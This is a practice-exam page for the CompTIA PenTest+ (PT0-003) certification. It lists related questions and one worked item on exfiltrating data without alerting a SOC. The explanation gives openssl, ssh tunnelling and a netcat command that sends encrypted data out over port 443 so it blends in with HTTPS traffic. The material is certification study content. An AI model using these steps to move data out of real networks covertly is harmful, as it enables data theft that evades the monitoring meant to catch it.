ExamGecko
Search Search Login
Home Home / CompTIA / PT0-003
Question list
Search
Search

List of questions

Search
Open VPLUS File
Convert VPLUS to PDF

Related questions

A penetration tester needs to evaluate the order in which the next systems will be selected for testing. Given the following output: Hostname | IP address | CVSS 2.0 | EPSS hrdatabase | 192.168.20.55 | 9.9 | 0.50 financesite | 192.168.15.99 | 8.0 | 0.01 legaldatabase | 192.168.10.2 | 8.2 | 0.60 fileserver | 192.168.125.7 | 7.6 | 0.90 Which of the following targets should the tester select next?
During a security assessment, a penetration tester needs to exploit a vulnerability in a wireless network's authentication mechanism to gain unauthorized access to the network. Which of the following attacks would the tester most likely perform to gain access?
A penetration tester gains initial access to a target system by exploiting a recent RCE vulnerability. The patch for the vulnerability will be deployed at the end of the week. Which of the following utilities would allow the tester to reenter the system remotely after the patch has been deployed? (Select two).
During a security audit, a penetration tester wants to run a process to gather information about a target network's domain structure and associated IP addresses. Which of the following tools should the tester use?
During a penetration test, a junior tester uses Hunter.io for an assessment and plans to review the information that will be collected. Which of the following describes the information the junior tester will receive from the Hunter.io tool?
A penetration tester needs to collect information over the network for further steps in an internal assessment. Which of the following would most likely accomplish this goal?
A penetration tester presents the following findings to stakeholders: Control | Number of findings | Risk | Notes Encryption | 1 | Low | Weak algorithm noted Patching | 8 | Medium | Unsupported systems System hardening | 2 | Low | Baseline drift observed Secure SDLC | 10 | High | Libraries have vulnerabilities Password policy | 0 | Low | No exceptions noted Based on the findings, which of the following recommendations should the tester make? (Select two).
Which of the following describes the process of determining why a vulnerability scanner is not providing results?
A penetration tester needs to launch an Nmap scan to find the state of the port for both TCP and UDP services. Which of the following commands should the tester use?
Which of the following tasks would ensure the key outputs from a penetration test are not lost as part of the cleanup and restoration activities?

Question 67 - PT0-003 discussion

Report
Export

A penetration tester discovers data to stage and exfiltrate. The client has authorized movement to the tester's attacking hosts only. Which of the following would be most appropriate to avoid alerting the SOC?

A.
Apply UTF-8 to the data and send over a tunnel to TCP port 25.
Answers
A.
Apply UTF-8 to the data and send over a tunnel to TCP port 25.
B.
Apply Base64 to the data and send over a tunnel to TCP port 80.
Answers
B.
Apply Base64 to the data and send over a tunnel to TCP port 80.
C.
Apply 3DES to the data and send over a tunnel UDP port 53.
Answers
C.
Apply 3DES to the data and send over a tunnel UDP port 53.
D.
Apply AES-256 to the data and send over a tunnel to TCP port 443.
Answers
D.
Apply AES-256 to the data and send over a tunnel to TCP port 443.
Suggested answer: D

Explanation:

AES-256 (Advanced Encryption Standard with a 256-bit key) is a symmetric encryption algorithm widely used for securing data. Sending data over TCP port 443, which is typically used for HTTPS, helps to avoid detection by network monitoring systems as it blends with regular secure web traffic.

Step-by-Step Explanation

Encrypting Data with AES-256:

Use a secure key and initialization vector (IV) to encrypt the data using the AES-256 algorithm.

Example encryption command using OpenSSL:

openssl enc -aes-256-cbc -salt -in plaintext.txt -out encrypted.bin -k secretkey

Setting Up a Secure Tunnel:

Use a tool like OpenSSH to create a secure tunnel over TCP port 443.

Example command to set up a tunnel:

ssh -L 443:targetserver:443 user@intermediatehost

Transferring Data Over the Tunnel:

Use a tool like Netcat or SCP to transfer the encrypted data through the tunnel.

Example Netcat command to send data:

cat encrypted.bin | nc targetserver 443

Benefits of Using AES-256 and Port 443:

Security: AES-256 provides strong encryption, making it difficult for attackers to decrypt the data without the key.

Stealth: Sending data over port 443 helps avoid detection by security monitoring systems, as it appears as regular HTTPS traffic.

Real-World Example:

During a penetration test, the tester needs to exfiltrate sensitive data without triggering alerts. By encrypting the data with AES-256 and sending it over a tunnel to TCP port 443, the data exfiltration blends in with normal secure web traffic.

Reference from Pentesting Literature:

Various penetration testing guides and HTB write-ups emphasize the importance of using strong encryption like AES-256 for secure data transfer.

Techniques for creating secure tunnels and exfiltrating data covertly are often discussed in advanced pentesting resources.

Penetration Testing - A Hands-on Introduction to Hacking

HTB Official Writeups

Show Answer
asked 02/10/2024
Raymond LaFrance
51 questions
PreviousPreviousNextNext
User
Your answer:
0 comments
Sorted by

Leave a comment first

ExamGecko

Copyright @2023 ExamGecko | All right reserved

Mail us: [email protected]
About us
Contact us
Twitter X
Facebook
Medium
Convert VPLUS to PDF
Open VPLUS files Easily and Quickly
Privacy Policy
Disclaimer
Terms